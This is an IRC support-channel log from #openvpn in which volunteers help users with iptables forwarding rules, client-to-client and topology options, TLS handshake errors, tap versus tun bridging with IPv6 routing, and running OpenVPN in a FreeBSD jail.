has quit [Ping timeout: 260 seconds] 13:46 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 14:09 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 14:10 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has joined #openvpn 14:19 < syn4pse-> what is the best way to disable communication between vpn clients? 14:20 < pekster> syn4pse-: Don't use the client-to-client directive and firewall the traffic as usual for your OS 14:20 < pekster> !c2c 14:20 <@vpnHelper> "c2c" is "client-to-client" is with this option packets from 1 client to another are routed inside the server process. without it packets leave the server process, hit the kernel (firewall, routing table) and if allowed by firewall and routed back to server process, they go to the client. you use this option when you do not want to use selective firewall rules on what clients can access things 14:20 <@vpnHelper> behind other clients 14:21 < syn4pse-> okey so basically disable client-to-client in config and then use iptables to restrict talk between those clients? 14:22 < pekster> Right 14:23 < pekster> It'll show up as forwarded traffic, so if you use a Linux-based OS, set up whatever rules you require on the FORWARD chain to suit your needs 14:24 < syn4pse-> iptables -A FORWARD -d 10.8.0.0/24 -j DROP 14:24 < syn4pse-> if 10.8.0.0 where my vpn subnet? 14:25 -!- jzaw [~jzaw@loki.dzki.co.uk] has quit [Quit: really? must I leave? aw pls let me stay!] 14:26 < pekster> Possibly, I don't know enough about your setup to say. That will match traffic being forwarded from some other network to VPN clients too, such as return traffic from a server-side LAN or gateway redirect situation 14:26 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 14:27 < syn4pse-> i have a vps and i have openvpn setup there, it should only forward traffic from the openvpn clients to the internet ( anon browsing basically ) 14:27 < syn4pse-> there are no further lans attached to the vpn server 14:28 < syn4pse-> pekster, would that rule mean that traffic returning to the clients will be dropped aswell ? 14:28 < syn4pse-> iptables -A FORWARD -d 10.8.0.0/24 -s 10.8.0.0/24 -j DROP 14:28 < syn4pse-> might it be smarter to also specify the source ? 14:29 < pekster> Probably, if your goal is to prevent the clients from communicating 14:29 < syn4pse-> i ll give it a try ;) 14:30 < pekster> IMO a smarter way to do that would be to use a DROP policy on your FILTER chain, and allow only traffic you wish to forward, but that's more of a topic for #netfilter which focuses on Linux/netfilter setup 14:30 < pekster> Then you don't need to "block" anything, you simply don't write a rule to accept it 14:36 < syn4pse-> okey i tried it doesn`t seem to work 14:37 < syn4pse-> i ll prolly start by reading the man page of iptables ;) 14:37 < syn4pse-> thanks for the idea 14:38 < pekster> There are some good guides linked from the first URL you'll find in the #netfilter /TOPIC if you need a more basic guide. The frozentux guide is one I've referenced/used in the past 14:39 < syn4pse-> cool 14:43 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 14:51 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 15:03 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 15:03 -!- mode/#openvpn [+v s7r] by ChanServ 15:17 -!- Devastator [~devas@186.214.110.30] has quit [Read error: Connection reset by peer] 15:18 -!- Devastator [~devas@186.214.110.30] has joined #openvpn 15:28 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 15:32 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:36 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has quit [Ping timeout: 245 seconds] 15:38 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn 15:56 -!- Devastator [~devas@186.214.110.30] has quit [Changing host] 15:56 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 16:13 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn 16:18 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 16:45 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:49 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 16:59 -!- antiisolo [solo@gateway/shell/anapnea.net/x-doayfdtntkosijyu] has left #openvpn [] 17:01 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 17:13 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn 17:13 < sqwerty> !paste 17:13 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 17:13 < sqwerty> !configs 17:13 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 17:18 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 17:18 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 17:27 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 245 seconds] 17:27 -!- sqwerty [~sqwerty@cpc3-aztw22-2-0-cust516.aztw.cable.virginmedia.com] has joined #openvpn 17:27 -!- sqwerty [~sqwerty@cpc3-aztw22-2-0-cust516.aztw.cable.virginmedia.com] has quit [Changing host] 17:27 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn 17:35 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Quit: Leaving] 17:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds] 17:37 -!- JSharpe [~JSharpe@46.165.221.13] has quit [Quit: Leaving] 17:45 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has left #openvpn [] 17:53 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [Read error: Connection reset by peer] 17:53 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 264 seconds] 17:53 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 18:01 -!- TMcTrain [~kvirc@p54BBB9D2.dip.t-dialin.net] has quit [Read error: Connection reset by peer] 18:01 -!- TMcTrain [~kvirc@p54BBB9D2.dip.t-dialin.net] has joined #openvpn 18:35 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 18:35 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 18:40 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 19:07 -!- syn4pse [~syn@p5DDC073B.dip0.t-ipconnect.de] has joined #openvpn 19:08 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has quit [Ping timeout: 246 seconds] 19:10 -!- JacquesBH [~jacques@unaffiliated/jacquesbh] has joined #openvpn 19:10 < JacquesBH> Hi :) 19:10 < JacquesBH> Somebody here? 19:10 < JacquesBH> I don't know what time is it in your part of the world :D 19:10 < pekster> !ask 19:10 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 19:11 -!- syn4pse- [~syn@p5DDC041D.dip0.t-ipconnect.de] has quit [Ping timeout: 255 seconds] 19:12 < JacquesBH> hello pekster :) oki sorry, I ask. 19:12 < JacquesBH> I can connect two computers to the VPN and I can ping the server 19:13 < JacquesBH> but from C1 (computer One) I can't ping C2 (computer 2) 19:13 < pekster> !c2c 19:13 <@vpnHelper> "c2c" is "client-to-client" is with this option packets from 1 client to another are routed inside the server process. without it packets leave the server process, hit the kernel (firewall, routing table) and if allowed by firewall and routed back to server process, they go to the client. you use this option when you do not want to use selective firewall rules on what clients can access things 19:13 <@vpnHelper> behind other clients 19:13 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has joined #openvpn 19:13 < JacquesBH> hum... I'm not sure to understand. 19:14 < pekster> Either use that option, or fix your firewalls. You might also have an issue with pushed routes if you are not pushing the route for the VPN range in the 'net30' or 'p2p' topology modes (see the !topology bot output for more info) 19:14 < JacquesBH> !topology 19:14 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 19:16 < JacquesBH> pekster: it seems that if I want ping client from client I need to use the p2p topology, right? 19:16 < JacquesBH> actually I think it's default... I check. 19:16 < pekster> net30 is the default topology, unless you specified otherwise 19:16 < pekster> Use of subnet topology is recommended unless you have exotic needs 19:18 < JacquesBH> ok 19:19 < pekster> Ah, I need to correct myself; using net30 or p2p topology will push the subnet only if you use the client-to-client option 19:19 < pekster> So, if you prefer to push the packets to your kernel and let your OS firewall deal with them, you must push the VPN route yourself. Otherwise, use that option and the route will be pushed for you (when you use the --server helper-directive, that is. See that option in the manpage for specifics) 19:21 < JacquesBH> I use openvpn on debian, so it's a simple install... I'm not really familiarized 19:22 < pekster> If you don't have the need to firewall client to client packets with custom rules, just use the --client-to-client option and it should all magically work 19:23 < pekster> That effectively what the !c2c output above reads 19:25 -!- p3rror [~mezgani@41.248.148.226] has quit [Ping timeout: 248 seconds] 19:25 < JacquesBH> the --client-to-client is translated with what in the server config file? 19:25 < pekster> "translated" ? 19:25 < pekster> !-- 19:25 <@vpnHelper> "--" is OpenVPN allows any option to be placed either on the command line or in a configuration file. Though all command line options are preceded by a double-leading-dash ("--"), this prefix is usually omitted when an option is placed in a configuration file. 19:25 < JacquesBH> hummm 19:26 < pekster> See also the first couple of pages in the openvpn manpage that explains this behaviour 19:26 < JacquesBH> so just "client-to-client" :) 19:26 < pekster> Right. Optionally you may keep the dashes if you'd like 19:26 < JacquesBH> Is the options "topology subnet" and "client-to-client" compatible? I'll try 19:26 < pekster> Yup 19:27 < JacquesBH> It works. <3 19:28 < JacquesBH> mega coooooool 19:29 < JacquesBH> thks pekster :) 19:29 < syn4pse> pekster, restarted from scratch, now all working smoothly and traffic is restricted like i wanted to 19:29 < syn4pse> thanks for help ;) 19:29 < JacquesBH> this chan is very helpfull. 19:41 -!- GabrieleV_ [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 19:44 -!- Netsplit *.net <-> *.split quits: Shadowized, GabrieleV, digilink, kmmndr 19:51 -!- kmmndr [~tomtom@bro67-2-82-227-110-8.fbx.proxad.net] has joined #openvpn 19:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 20:01 -!- JackWinter1 [~jack@ppp-256.vo.lu] has joined #openvpn 20:05 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Ping timeout: 264 seconds] 20:08 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 20:13 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 20:28 -!- JackWinter1 [~jack@ppp-256.vo.lu] has quit [Ping timeout: 255 seconds] 21:00 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 21:30 -!- p3rror [~mezgani@41.248.148.226] has joined #openvpn 21:46 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 22:01 -!- p3rror [~mezgani@41.248.148.226] has quit [Ping timeout: 248 seconds] 22:07 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 23:54 -!- p3rror [~mezgani@41.248.148.226] has joined #openvpn 23:54 < p3rror> hello 23:54 < p3rror> please why I have this error : 23:54 < p3rror> TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity) 23:54 < p3rror> TLS Error: TLS handshake failed 23:55 < pekster> Usually a network or firewall problem, or possibly caused if your peer rejects your certificate 23:55 < pekster> Can you check the logs on the other end? 23:58 < p3rror> oups 23:58 < p3rror> I have to activate log on the server 23:58 < p3rror> how to do that 23:59 < p3rror> in the server.conf 23:59 < p3rror> which directive I have to add to append log 23:59 < pekster> !log 23:59 <@vpnHelper> Error: You don't have the owner capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 23:59 < pekster> !factoids search log 23:59 <@vpnHelper> 'logs', 'log', 'logfile', 'change-log', 'irclogs', 'topology', 'blog', and 'changelog' 23:59 < pekster> ... 23:59 < pekster> Dumb bot 23:59 < pekster> !factoids whatis log 23:59 <@vpnHelper> "log" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging --- Day changed Mon Mar 11 2013 00:00 < p3rror> OK 00:00 < pekster> --log-append is like log but appends 00:03 < p3rror> pekster, yes 00:04 < p3rror> pekster, all I have is that http://paste.debian.net/240892/ 00:05 < p3rror> and I still getting the TLS Error: TLS handshake failed in the client 00:08 < pekster> p3rror: You've let the client attempt to connect and the server has no extra lines in the logfile? 00:08 < p3rror> no 00:08 < p3rror> only that 00:08 -!- NNAEMEKA [~chatzilla@41.206.15.49.vgccl.net] has joined #openvpn 00:09 < pekster> Then it would appear your client isn't successfully reaching your server. Either you have the wrong IP/port in the client config, or something is preventing the traffic from being delivered 00:09 < pekster> Firewalls are a common place to start looking for issues 00:12 < p3rror> pekster, OK 00:14 < NNAEMEKA> help 00:16 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has quit [Read error: Connection reset by peer] 00:21 < NNAEMEKA> !factoids 00:21 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 00:22 < NNAEMEKA> iman 00:23 < NNAEMEKA> !man 00:23 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 00:24 -!- p3rror [~mezgani@41.248.148.226] has quit [Quit: Leaving] 00:33 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 00:37 -!- NNAEMEKA [~chatzilla@41.206.15.49.vgccl.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 20.0/20130307075451]] 00:49 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has joined #openvpn 00:50 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has left #openvpn [] 01:05 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 01:13 -!- p3rror [~mezgani@41.248.148.226] has joined #openvpn 01:24 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Quit: nonotza] 01:24 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 01:29 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 02:15 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:25 -!- Shadowized [~Shadowize@84.201.4.120] has joined #openvpn 02:25 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 02:40 -!- TMcTrain [~kvirc@p54BBB9D2.dip.t-dialin.net] has quit [Ping timeout: 248 seconds] 03:04 -!- thinkHell [~Hell@85.15.47.27] has joined #openvpn 03:11 -!- corretico [~luis@190.211.93.38] has joined #openvpn 03:11 -!- brute11k [~brute@89.249.235.169] has joined #openvpn 03:12 -!- krzee [ba0740c2@openvpn/community/support/krzee] has joined #openvpn 03:12 -!- mode/#openvpn [+o krzee] by ChanServ 03:15 <@krzee> !ping 03:15 <@vpnHelper> pong 03:15 <@krzee> http://pastebin.com/iWcgFaD1 i cant figure out why this client-connect script is failing 03:16 <@krzee> WARNING: Failed running command (--client-connect): external program exited with error status: 1 03:17 <@krzee> pekster: still awake? 03:20 <@krzee> or maybe EugeneKay? =] 03:23 < pekster> krzee: The test doesn't match, so exit returns the implicit '1' error code from that. You should exit your scripts with an explicit success code in such cases, and good practice suggests you do so anyways to avoid such surprises 03:24 <@krzee> meh i see, thanks =] 03:24 -!- jzaw [~jzaw@loki.dzki.co.uk] has joined #openvpn 03:24 < jzaw> morning peeps 03:25 <@krzee> car got stolen last night, and my drunk ass forgot my laptop and a phone in it 03:25 <@krzee> if the phone gets on the internet, this will run and send me the IP 03:25 < jzaw> can one use statements like up ip route add blah blah ... in ovpn? 03:25 < jzaw> and does one then use a down ip route del ? 03:26 <@krzee> !script 03:26 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn 03:26 < jzaw> ta 03:26 <@krzee> you can run any commands in a script 03:26 <@krzee> but theres also --route 03:26 < pekster> Also note jzaw that if you just want control of routes when the VPN comes up and down, the --route command works great, and can be pushed from the server, even in a dynamic sense 03:27 < pekster> The server can push them to clients in ccd files or a --client-connect script if you require per client or dynamic control 03:27 < jzaw> its the route on the server i was wanting to control 03:27 < jzaw> im getting tap0 with ip and routes (and ipv6) on the client 03:28 < jzaw> but of course im remote to the server and cant get into it cos its down the tap0 ... which isnt yet passing my traffic (though logs show lots of exchange and chatter) 03:29 < jzaw> so i cant see exactly whats happening at that end 03:29 < pekster> In a tap setup you do not need to add a route for the VPN network as that is an on-link route 03:30 < jzaw> hmmm but the client gets routes (for itself) down the tap? 03:30 < pekster> It's a IP/mask configuration, just like your Ethernet card 03:31 < pekster> if you do 'ip addr add 10.8.0.1/24' on an adapter, you get the entire /24 route on-link 03:31 < pekster> tun is different; that's a virtual point-to-point link with no on-link routes since it's just the two "points" on the link 03:31 < jzaw> so when i do ip route show on client i can see how the pkts should go 03:32 < jzaw> should i see similar on the server? 03:32 < pekster> My guess is that you messed up the bridge setup if you've lost access with the server. Judging by your reference to the 'ip' command, I assume you're on Linux, where the bridge holds the address, not the bridge members 03:32 < jzaw> ie before the tap comes up ... on the client i dont see routes down the tap 03:32 < jzaw> well this is the problm 03:32 < pekster> What do you mean on the client you "don't see routes down the tap" ? 03:32 < jzaw> im seeing ip's on the br and the tap 03:33 < jzaw> before tap comes up 03:33 < jzaw> 169.254.0.0/16 dev br0 scope link metric 1000 03:33 < jzaw> 192.168.0.0/24 dev br0 proto kernel scope link src 192.168.0.5 03:33 -!- p3rror [~mezgani@41.248.148.226] has quit [Ping timeout: 276 seconds] 03:33 < jzaw> when it comes up 03:33 < jzaw> 81.2.122.192/26 via 81.2.122.209 dev tap0 03:33 < jzaw> 81.2.122.208/29 dev tap0 proto kernel scope link src 81.2.122.210 03:33 <@krzee> pekster: same error, ill paste here cause its only 3 lines 03:33 <@krzee> #!/bin/bash [[ ${common_name} == "jeff-cell" ]] && /bin/env | /bin/mail -s "login from 5150" jeff@doeshosting.com exit 03:33 < jzaw> two new extra ones 03:34 <@krzee> oops webchat flattens it 03:34 <@krzee> ill pastebin after-all 03:34 < jzaw> when the tap gets taken down .... the 81.xxxxx routes go away 03:34 < pekster> krzee: Right. Your test returns '1' (ie: false, no match.) exit has no argument, and thus returns the value of the last exit status (1). This is non-zero, and openvpn treats it as an auth failure 03:35 < pekster> "exit 0" is how you explicitly exit with a 0 status 03:35 < pekster> Same is true of the 'return' builtin in *sh shells 03:35 <@krzee> oh hah 03:35 < pekster> s/exit status/command stat/s 03:35 <@krzee> i thought exit always meant 0 03:35 <@krzee> when no arg 03:35 < pekster> Nope 03:35 <@krzee> thx again =] 03:37 < pekster> jzaw: The tap device is getting assigned an IP then. If it's bridged to something on either end, you should stop trying to push an address to it through openvpn and put it on the bridge yourself, or let the OS's DHCP mechanism do it 03:37 < pekster> I'm not exactly sure what you're trying to accomplish by sending an IP to a tap device bridged to an adapter on your client side anyway. That's not going to do what you want 03:37 <@krzee> pekster++ 03:37 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 03:38 < pekster> If you really know what you're doing when you bridge tap0 to br0 on the client end, stop trying to push an address to tap0 from the server. Manage it on the bridge interface 03:40 -!- JackWinter1 [~jack@ppp-256.vo.lu] has joined #openvpn 03:40 < jzaw> at the server im using .... local 81.2.122.221 and server 81.2.122.208 255.255.255.248 03:40 < pekster> --server-bridge? --server is not valid in a tap context 03:40 < jzaw> the tap at the client end comes up with that ip .. not the bridge which seem to keep its 192.168.0.5 addy 03:41 < jzaw> ahhhhh 03:41 < pekster> tap is for Ethernet (OSI Layer2) connectivity, and functions like an Ethernet switch does 03:41 < pekster> tun is what you want unless you actually need to exchange Ethernet frames 03:42 < jzaw> i do want the latter .. ie i want to have my RA on the server end give me ipv6 at client end 03:42 < pekster> Then you don't want a bridge at all on the client 03:43 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Ping timeout: 248 seconds] 03:43 < jzaw> im totally confused then ... every howto seems to use tap + bridge both server and client end 03:44 < pekster> You do not want a bridge at all on the client unless you intend to join the *client* LAN to the server's remote LAN 03:44 < pekster> And that's generally a very bad idea 03:45 < pekster> You really shouldn't do that. If you want to expose remote IPv6 access to a remote LAN like that, set up IPv6 on the remote LAN with your own radvd and route to your remote server via a VPN link 03:45 < jzaw> i do want my client lan devices to route some (most) traffic down the vpn 03:45 <@krzee> so why bridge at all? 03:45 < pekster> Okay, if you want to route traffic, you want a routed (tun) setup 03:45 < pekster> Yea, no bridging needed 03:46 < jzaw> fair enough 03:46 <@krzee> this will be easiest on a router running openvpn on the client sid 03:46 <@krzee> side* 03:47 < jzaw> so tun + routing? 03:47 < pekster> IPv6 is fine, just assign a /64 there if you want to use SLAAC and route it across the link like any other traffic. Give both ends a v4 and v6 address on the VPN, and set up routing as you would normally for a gateway 03:47 <@krzee> then you can redirect on the router, and all lan redirects too 03:47 <@krzee> !sample 03:47 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting 03:47 <@krzee> !redirect 03:47 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 03:47 <@vpnHelper> http://ircpimps.org/redirect.png 03:48 < jzaw> thanks reading now :) 03:48 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 255 seconds] 03:49 -!- newbie [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 03:49 < jzaw> btw the server end is a routed no nat .. ie has public ipv4 ips .... client end is single public ip and client is behind nat 03:50 -!- newbie is now known as TMcTrain 03:51 < pekster> What are you trying to do? Give every system on the LAN its own public IP, or merely redirect the entire LANs outbound traffic to the remote system and perform NAT on it to the server's public IP? 03:54 < pekster> I'm not sure about your IPv4 setup, but the proper way to do IPv6 is routing. If you are expsoing IPv6 space at the server to the client LAN, you need a deligated block of network space (at least a /64 for SLAAC) that is separate from the network your server is on. This need to be *routed*, not on-link. 03:55 < pekster> DHCPv6 has a PD feature for this purpose, or you may need to request this from your provider. And that's all somewhat outside the scope of openvpn. Once you have that, you can use a /64 from your deligation on your home LAN and route across the VPN link you establish (the link itself also needs to be a unique network, although you could in theory just use ULA or link-local addresses for the link) 03:56 < pekster> provider being your network provider at the server end 03:57 < pekster> Anyway, I'm up far past my normal sleep time. Best of luck, and there's also #ipv6 if you need direction or reference material on the IPv6 side of things 03:59 <@krzee> gnite 03:59 -!- krzee [ba0740c2@openvpn/community/support/krzee] has quit [Quit: Page closed] 04:14 -!- MaximB [~maxim@bzq-218-139-133.cablep.bezeqint.net] has joined #openvpn 04:15 < MaximB> Hello, I got openvpn setup and working, I am able to connect fine but I need to supply a "Private Key Password" , it works well manually - but is it possible to do it automatically , run openvpn and supply the pass in cli? 04:22 < JacquesBH> !tap32 04:23 < JacquesBH> :p I tried... 04:23 < JacquesBH> So, what is TAP-Win32 on windows ? 04:23 < JacquesBH> Because a friend have this error (I'm on Mac) 04:23 -!- zz_AsadH is now known as AsadH 04:42 -!- thinkHell [~Hell@85.15.47.27] has quit [Ping timeout: 255 seconds] 04:43 -!- thinkHell [~Hell@85.15.47.27] has joined #openvpn 04:46 -!- dxtr [0005ac03@unaffiliated/dxtr] has left #openvpn [] 05:01 -!- brute11k1 [~brute@89.249.235.169] has joined #openvpn 05:02 -!- dazo_afk is now known as dazo 05:03 -!- brute11k [~brute@89.249.235.169] has quit [Ping timeout: 264 seconds] 05:06 -!- mustu [~maan@unaffiliated/mustu] has joined #openvpn 05:07 < mustu> hi, I need to connecte a VPN over my OpenVPN connection.. any clue? 05:12 -!- MaximB [~maxim@bzq-218-139-133.cablep.bezeqint.net] has left #openvpn [] 05:44 -!- brute11k1 [~brute@89.249.235.169] has quit [Ping timeout: 250 seconds] 05:45 -!- brute11k [~brute@89.249.235.169] has joined #openvpn 05:46 -!- erry [erry@happy/birthday/erry] has quit [Changing host] 05:46 -!- erry [erry@freenode/staff/erry] has joined #openvpn 06:00 -!- thinkHell [~Hell@85.15.47.27] has quit [Quit: ["pop()"]] 06:06 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 06:14 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Read error: Connection reset by peer] 06:15 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 06:22 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 06:22 -!- _b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 06:22 -!- _b00b is now known as b00b 06:47 -!- oskie [~usel@h-254-83.a218.priv.bahnhof.se] has left #openvpn [] 06:58 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 07:11 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn 07:24 -!- JSharpe [~JSharpe@46.165.221.13] has joined #openvpn 07:47 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 260 seconds] 07:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:53 -!- no0 [~ns@2001:878:200:1053:30a9:3c95:6513:3468] has joined #openvpn 08:06 -!- corretico [~luis@190.211.93.38] has quit [Remote host closed the connection] 08:09 < rob0> erry, happy birthday :) 08:12 < erry> thanks ;p 08:12 -!- datruth [~datruth@unaffiliated/datruth] has joined #openvpn 08:12 < datruth> I'm running FreeBSD 8.3 is it possiable to run openvpn server inside of a jail? 08:12 -!- no0 [~ns@2001:878:200:1053:30a9:3c95:6513:3468] has quit [Quit: no0] 08:15 < Aprogas> I never tried, but since OpenVPN goes "inside" of UDP, I would guess it is. 08:15 <@ecrist> datruth: yes, it is 08:17 < datruth> hrmm 08:17 * datruth coontinues to google 08:17 <@ecrist> what problem are you having? 08:18 < datruth> ecrist: i've configure the jail+devfs.rules to allow the jail to see the tun device when I try to start it its says its unable to allocate tun/tap device dynamically 08:19 <@ecrist> as root, in the jail, are you able to assign/configure the tun device? 08:20 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 276 seconds] 08:20 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 08:21 < datruth> hrmm ecrist since I am in a jail I dont believe that is allowed 08:21 <@ecrist> that's the biggest issue 08:22 <@ecrist> I think, when we ran inside a jail, we were using bridged mode 08:22 < datruth> hrmm 08:25 < datruth> perhaps it might be easier to just run it on the host :( 08:26 < rob0> you can probably preallocate the tun before entering the jail 08:27 < datruth> rob0: thats what I am doing I thought 08:27 < datruth> I can set an ip to it etc 08:27 < datruth> during the boot of the jail that is 08:27 <@ecrist> rob0: you can't assign an IP to a device from within the jail 08:28 <@ecrist> at least, that's the way it was when I last used jails 08:28 -!- mattock_afk is now known as mattock 08:30 < datruth> yeah you can't assign an ip from inside the jail 08:36 < datruth> ecrist: is there a reason to put openvpn inside of jail does it make it more secure? 08:38 <@ecrist> no, it doesn't 08:38 <@dazo> what's the purpose of jails then? 08:39 <@ecrist> overgrown chroot 08:39 < datruth> I don't see anyway how a user could hack into the system via openvpn 08:39 < datruth> so putting it in a jail might be overkill? 08:39 <@dazo> datruth: buffer overflow leading to a potential remote execution of binary code ...? 08:40 < datruth> I guess that is possiable :( 08:41 <@dazo> within a jail ... it should be harder to do that, to get access to "tools" like a shell, wget/curl, etc ... to download even more to make your box a botnet member or whatever they'd like to do with your box 08:42 -!- vaillor [~ahah@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 08:43 < vaillor> hi guys, i'm having troubles configuring a static key tunnel with my iphone 08:43 < vaillor> i imported the client config that i use on my linux client and the static.key 08:43 < vaillor> they are imported well 08:43 < vaillor> but openvpn connect doesn't let me connect 08:44 < datruth> dazo: ahh gotcha i'll continue to google and try and figure out why the vpn wont start and how to resolve it 08:45 <@ecrist> dazo: a jail isn't really going to prevent that attack vector. a jail runs on the base systems kernel, and the jail ID is attached to the process. a buffer overflow will likely work around that. jails have the full system's resources, as well, regarding system tools and utilities, though that is/can be separate from the base system 08:46 <@ecrist> datruth: if you're using routed VPN, it won't start because it can't assign the IP to the tun interface 08:47 < datruth> ecrist: i'm setting the ip during boot time 08:47 <@ecrist> what does your openvpn log show, and what does the config look like? 08:48 < vaillor> so? any help? 08:48 < datruth> I'll get a pastebin going 08:48 <@dazo> hmmm ... I see ... then the BSD jails are pretty different from Linux containers ... even though, they're not a security feature by itself ... but you get separate PID namespaces, network namespaces and they're working on uid/gid namespaces too, ... so it's a weird mixture of virtualisation without actually using virtualisation 08:49 <@ecrist> right 08:51 <@ecrist> vaillor: your key needs to be inline, not a separate file. also, need to see logs to help 08:52 < datruth> ecrist: http://paste.ee/p/LWjHv 08:52 * EugeneKay stomach rumbles 08:52 